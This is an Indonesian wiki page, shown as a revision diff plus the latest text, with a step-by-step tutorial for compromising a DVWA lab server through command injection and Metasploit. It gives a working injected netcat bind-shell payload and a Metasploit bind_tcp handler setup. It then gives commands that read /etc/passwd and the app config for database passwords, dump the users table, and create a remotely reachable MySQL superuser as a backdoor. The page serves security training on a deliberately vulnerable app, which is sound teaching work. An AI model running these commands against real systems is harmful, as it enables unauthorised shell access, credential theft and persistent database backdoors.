DVWA: Exploit menggunakan Metasploit: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
← Older edit
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
Onnowpurbo (talk | contribs)
69,477 edits
 
(5 intermediate revisions by the same user not shown)
Line 22: Line 22:


Dimana 192.168.0.100 adalah IP address server DVWA
Dimana 192.168.0.100 adalah IP address server DVWA
Teknik ini akan membuka server pada port 4444 menggunakan NC ....
Ini tempat masuk bagi Metasploit.


==Gunakan metasploit==
==Gunakan metasploit==
Line 41: Line 44:


  whoami
  whoami
  grep apache /etc/passwd
  grep www-data /etc/passwd
  grep apache /etc/group
  grep www-data /etc/group




Line 55: Line 58:
Cari password database
Cari password database


  ls -l /var/www/html/dvwa/config
  ls -l /var/www/html/DVWA-1.9/config
  cat /var/www/html/dvwa/config/config.inc.php
  cat /var/www/html/DVWA-1.9/config/config.inc.php


Explorasi database
Explorasi database, asumsi username MySQL root, password 123456




  echo "show databases;" | mysql -uroot -pdvwaPASSWORD
  echo "show databases;" | mysql -uroot -p123456
  echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
  echo "use dvwa; show tables;" | mysql -uroot -p123456
  echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
  echo "use dvwa; desc users;" | mysql -uroot -p123456
  echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
  echo "select * from dvwa.users;" | mysql -uroot -p123456


Buat user baru
Buat user baru


  echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
  echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
  echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
  echo "select * from dvwa.users;" | mysql -uroot -p123456
   
   
Lihat informasi tabel MySQL
Lihat informasi tabel MySQL




  echo "show databases;" | mysql -uroot -pdvwaPASSWORD
  echo "show databases;" | mysql -uroot -p123456
  echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
  echo "use mysql; show tables;" | mysql -uroot -p123456
 
Ini bagian paling berbahaya, buat user MySQL yang baru
 
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456
echo "select * from mysql.user;" | mysql -uroot -p123456
 
Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( ..


Buat user MySQL yang baru
==Cek dari console Kali Linux==


  echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
  mysql -u db_hacker -h 192.168.0.100 -pabc123
  echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
  show databases;
quit


==Referensi==
==Referensi==


* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Latest revision as of 21:18, 3 May 2017

Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Persiapan

Masuk ke DVWA, misalnya 

http://192.168.0.80/DVWA-1.9

username admin
password password

Klik 

DVWA Security > Security Level Low > Submit


Siapkan NetCat

Masuk ke DVWA Command Injection, lakukan 

192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dimana 192.168.0.100 adalah IP address server DVWA

Teknik ini akan membuka server pada port 4444 menggunakan NC .... Ini tempat masuk bagi Metasploit.

Gunakan metasploit

Jalankan 

msfconsole thankyou

Lakukan 


use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.100
exploit

Cek password 

whoami
grep www-data /etc/passwd
grep www-data /etc/group


Cek Password melalui konfigurasi Web 

ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/DVWA*
ls -l /var/www/html/DVWA*

Cari password database 

ls -l /var/www/html/DVWA-1.9/config
cat /var/www/html/DVWA-1.9/config/config.inc.php

Explorasi database, asumsi username MySQL root, password 123456 


echo "show databases;" | mysql -uroot -p123456
echo "use dvwa; show tables;" | mysql -uroot -p123456
echo "use dvwa; desc users;" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456

Buat user baru 

echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456

Lihat informasi tabel MySQL 


echo "show databases;" | mysql -uroot -p123456
echo "use mysql; show tables;" | mysql -uroot -p123456

Ini bagian paling berbahaya, buat user MySQL yang baru 

echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456
echo "select * from mysql.user;" | mysql -uroot -p123456

Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( ..

Cek dari console Kali Linux

mysql -u db_hacker -h 192.168.0.100 -pabc123
show databases;
quit

Referensi

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=DVWA:_Exploit_menggunakan_Metasploit&oldid=47773"